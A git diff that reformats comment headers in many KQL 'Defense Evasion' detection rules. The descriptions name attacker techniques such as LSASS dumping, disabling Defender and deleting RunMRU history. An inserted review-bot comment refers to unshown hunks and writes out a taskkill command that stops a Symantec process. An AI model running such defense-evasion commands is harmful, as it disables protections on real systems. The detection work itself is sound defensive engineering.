+// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
index ae538fc8..8881b362 100644
--- a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
+++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql
@@ -3,7 +3,6 @@
 // Date: 2023-01-27
 // Level: medium
 // Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
index 62321492..440754e0 100644
--- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql
@@ -3,8 +3,7 @@
 // Date: 2021-06-09
 // Level: high
 // Description: Detects potential persistence activity via outlook home page.
-An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
-
+// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112
 
diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
index c1c59c55..bcf744d7 100644
--- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
+++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql
@@ -3,8 +3,7 @@
 // Date: 2021-06-10
 // Level: high
 // Description: Detects potential persistence activity via outlook today page.
-An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
-
+// An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112
 
diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
index acc10fec..596765b3 100644
--- a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
+++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql
@@ -3,8 +3,7 @@
 // Date: 2018-08-25
 // Level: high
 // Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
-This detection assumes that PowerShell commands are passed via the CommandLine.
-
+// This detection assumes that PowerShell commands are passed via the CommandLine.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.011
 
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
index 95e665ee..f196d95c 100644
--- a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
+++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-07-12
 // Level: high
 // Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.
-The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
-Attackers abuse this utility to install malicious MOF scripts
-
+// The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
+// Attackers abuse this utility to install malicious MOF scripts
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 
diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
index 79ad5087..04bb8eee 100644
--- a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
+++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql
@@ -3,8 +3,7 @@
 // Date: 2022-12-29
 // Level: medium
 // Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
-Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-
+// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
index 6ce8288c..44e61799 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_cmd_shell_output_redirect.kql
@@ -3,8 +3,7 @@
 // Date: 2022-07-12
 // Level: medium
 // Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
-This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
index b65c479e..6b6db9ad 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_execution_from_parent_process_in_public_folder.kql
@@ -3,7 +3,6 @@
 // Date: 2022-02-25
 // Level: high
 // Description: Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1564, attack.t1059
 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
index d5dbfc34..198214a4 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_ping_copy_command_combination.kql
@@ -3,7 +3,6 @@
 // Date: 2023-07-18
 // Level: medium
 // Description: Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.004
 
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
index 362e2577..27e47681 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql
@@ -3,8 +3,7 @@
 // Date: 2024-08-16
 // Level: medium
 // Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
-Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
-
+// Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.command-and-control, attack.t1218.011, attack.t1071
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
index 8151d305..e0cea487 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_wdac_policy_file_creation.kql
@@ -3,7 +3,6 @@
 // Date: 2025-02-07
 // Level: medium
 // Description: Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql
index 2806782f..56626ac0 100644
--- a/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql
+++ b/KQL/rules/Defense Evasion/potentially_suspicious_wuauclt_network_connection.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-12
 // Level: medium
 // Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
-One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
-
+// One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 
diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
index 36da9f08..4d40e3d9 100644
--- a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
+++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
@@ -3,9 +3,8 @@
 // Date: 2025-07-11
 // Level: high
 // Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
-This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
-An attacker might use this technique via the command line to bypass defenses before executing payloads.
-
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
+// An attacker might use this technique via the command line to bypass defenses before executing payloads.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
index dc49a90c..1f195db4 100644
--- a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
+++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
@@ -3,8 +3,7 @@
 // Date: 2024-07-23
 // Level: medium
 // Description: Detects the use of powershell commands from headless ConHost window.
-The "--headless" flag hides the windows from the user upon execution.
-
+// The "--headless" flag hides the windows from the user upon execution.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
 
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
index 595bfd68..dcd20223 100644
--- a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
+++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
@@ -3,7 +3,6 @@
 // Date: 2023-03-14
 // Level: medium
 // Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
index b67708b4..a7d5dc12 100644
--- a/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
+++ b/KQL/rules/Defense Evasion/process_proxy_execution_via_squirrel_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-06-09
 // Level: medium
 // Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
index 9ccb15f5..bc1d55df 100644
--- a/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
+++ b/KQL/rules/Defense Evasion/proxy_execution_via_vshadow.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-26
 // Level: medium
 // Description: Detects the invocation of vshadow.exe with the -exec parameter that executes a specified script or command after the shadow copies are created but before the VShadow tool exits.
-VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
-attackers can leverage this parameter to proxy the execution of malware.
-
+// VShadow is a command-line tool that you can use to create and manage volume shadow copies. While legitimate backup or administrative scripts may use this flag,
+// attackers can leverage this parameter to proxy the execution of malware.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1202
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
index 875e0868..b6a46bbb 100644
--- a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
+++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-10-10
 // Level: medium
 // Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
-Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
-Threat actors abused older vulnerable versions to manipulate system processes.
-
+// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
+// Threat actors abused older vulnerable versions to manipulate system processes.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
index 6ed4cedb..3d3c5926 100644
--- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
@@ -3,8 +3,7 @@
 // Date: 2023-08-22
 // Level: high
 // Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
-Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
-
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
index 4c02c568..c6146bf3 100644
--- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
@@ -3,8 +3,7 @@
 // Date: 2024-08-23
 // Level: high
 // Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
-Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
-
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1562.001
diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
index 7a42b235..dda31efe 100644
--- a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
+++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
@@ -3,9 +3,8 @@
 // Date: 2020-05-03
 // Level: low
 // Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
-Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
-Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
-
+// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
+// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
index c11f7694..f9247303 100644
--- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-06
 // Level: high
 // Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
index a6cde613..0d23e690 100644
--- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-29
 // Level: medium
 // Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.persistence, attack.t1112
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
index e7d6a322..b8ed369a 100644
--- a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
+++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
@@ -3,8 +3,7 @@
 // Date: 2025-06-04
 // Level: low
 // Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity.
-Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
-
+// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.009
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
index ec27779c..28938509 100644
--- a/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
+++ b/KQL/rules/Defense Evasion/remote_file_download_via_findstr_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2020-10-05
 // Level: medium
 // Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
diff --git a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
index ff46027a..fd65b999 100644
--- a/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
+++ b/KQL/rules/Defense Evasion/remove_scheduled_cron_task_job.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-15
 // Level: medium
 // Description: Detects usage of the 'crontab' utility to remove the current crontab.
-This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
-
+// This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
diff --git a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
index 29d72669..d15ceab3 100644
--- a/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
+++ b/KQL/rules/Defense Evasion/renamed_procdump_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2019-11-18
 // Level: high
 // Description: Detects the execution of a renamed ProcDump executable.
-This often done by attackers or malware in order to evade defensive mechanisms.
-
+// This often done by attackers or malware in order to evade defensive mechanisms.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
index c1d66e6c..982770ca 100644
--- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion.kql
@@ -3,9 +3,8 @@
 // Date: 2025-09-25
 // Level: high
 // Description: Detects deletion of the RunMRU registry key, which stores the history of commands executed via the Run dialog.
-In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
-Adversaries may delete this key to cover their tracks after executing commands.
-
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.003
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
index 21243bfb..b44d889b 100644
--- a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
+++ b/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
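Review bot: The re-commented description line `+// This often done by attackers or malware in order to evade defensive mechanisms.` carries over a grammar slip from the original text; since the line is rewritten anyway, `// This is often done by attackers or malware in order to evade defensive mechanisms.` reads correctly. The same applies to the eventlog-clearing hunk (`This technique were seen used` → `This technique was seen used`) and to the taskkill Symantec hunk, where the command and its argument are split across the sentence (`execute the taskkill /im command several times ccSvcHst.exe /f`) and would read more clearly as `execute "taskkill /im ccSvcHst.exe /f" several times`. These are comment lines only, so the rule logic is unaffected; the query body of each rule lies outside the hunks.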
@@ -3,9 +3,8 @@
 // Date: 2025-09-25
 // Level: high
 // Description: Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.
-In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
-Adversaries may delete this key to cover their tracks after executing commands.
-
+// In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.
+// Adversaries may delete this key to cover their tracks after executing commands.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.003
diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
index 8800d03f..0328c4af 100644
--- a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql
@@ -3,8 +3,7 @@
 // Date: 2024-02-05
 // Level: high
 // Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
-This behavior has been observed in-the-wild by different threat actors.
-
+// This behavior has been observed in-the-wild by different threat actors.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
index 6cb1c1f4..6c230635 100644
--- a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
@@ -3,9 +3,8 @@
 // Date: 2024-02-05
 // Level: medium
 // Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
-These files are used by the "iexpress.exe" utility in order to create self extracting packages.
-Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
-
+// These files are used by the "iexpress.exe" utility in order to create self extracting packages.
+// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
index 681835b2..3e47c582 100644
--- a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
+++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-06-28
 // Level: high
 // Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.001
diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
index 67e98b86..2344db98 100644
--- a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2025-10-18
 // Level: high
 // Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes.
-Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
-
+// Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
index 506c97ea..11de8336 100644
--- a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
+++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql
@@ -3,7 +3,6 @@
 // Date: 2019-02-09
 // Level: high
 // Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
diff --git a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
index 19e22c22..0e46bca3 100644
--- a/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
+++ b/KQL/rules/Defense Evasion/suspicious_copy_from_or_to_system_directory.kql
@@ -3,8 +3,7 @@
 // Date: 2020-07-03
 // Level: medium
 // Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
-Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
-
+// Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
index 87f4b733..76cfacf8 100644
--- a/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
+++ b/KQL/rules/Defense Evasion/suspicious_customshellhost_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-19
 // Level: high
 // Description: Detects the execution of CustomShellHost.exe where the child isn't located in 'C:\Windows\explorer.exe'. CustomShellHost is a known LOLBin that can be abused by attackers for defense evasion techniques.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1216
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql
index 9c7bc5b3..9255b130 100644
--- a/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql
+++ b/KQL/rules/Defense Evasion/suspicious_eventlog_clearing_or_configuration_change_activity.kql
@@ -3,8 +3,7 @@
 // Date: 2019-09-26
 // Level: high
